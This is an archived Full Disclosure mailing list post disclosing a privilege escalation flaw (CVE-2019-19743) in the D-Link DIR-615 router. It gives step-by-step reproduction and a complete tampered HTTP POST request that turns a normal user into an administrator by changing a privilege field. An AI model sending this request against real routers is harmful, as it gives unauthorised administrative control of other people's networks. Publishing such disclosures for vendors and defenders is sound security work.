Full Disclosure mailing list archives

D-Link DIR-615 — Vertical Prviliege Escalation


From: Sanyam Chawla <infosecsanyam () gmail com>
Date: Mon, 16 Dec 2019 20:37:39 +0530

######################################################################################

# Exploit Title: D-Link DIR-615 — Vertical Prviliege Escalation

# Date: 10.12.2019

# Exploit Author: Sanyam Chawla

# Vendor Homepage: http://www.dlink.co.in

# Category: Hardware (Wi-fi Router)

# Hardware Link: http://www.dlink.co.in/products/?pid=678

# Hardware Version: T1

# Firmware Version: 20.07

# Tested on: Windows 10 and Kali linux

# CVE: CVE-2019–19743

#######################################################################################



Reproduction Steps:

   1. Login to your wi-fi router gateway with normal user credentials [i.e:
   http://192.168.0.1]
   2. Go to the Maintenance page and click on Admin on the left panel.
   3. There is an option to create a user and by default, it shows only
   user accounts.
   
<https://1.bp.blogspot.com/-f-MOwxhgrRI/XfUZSszN8TI/AAAAAAAAFb8/v2193GabEVYOO_Ax89FPrBymNTxXc32_wCLcBGAsYHQ/s1600/1.PNG>
   4. Create an account with a name(i.e ptguy) and change the privileges
   from user to root(admin) by changing privileges id (1 to 2) with burp suite.


Privilege Escalation Post Request

POST /form2userconfig.cgi HTTP/1.1

Host: 192.168.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0)
Gecko/20100101 Firefox/71.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 122

Origin: http://192.168.0.1

Connection: close

Referer: http://192.168.0.1/userconfig.htm

Cookie: SessionID=

Upgrade-Insecure-Requests: 1

username=ptguy&*privilege=2*&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send

       5. Now log in with newly created root (ptguy) user. You have all
administrator rights.


Please let me know if any other information required from my side for this
vulnerability.


Best Regards,

Sanyam Chawla

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Current thread: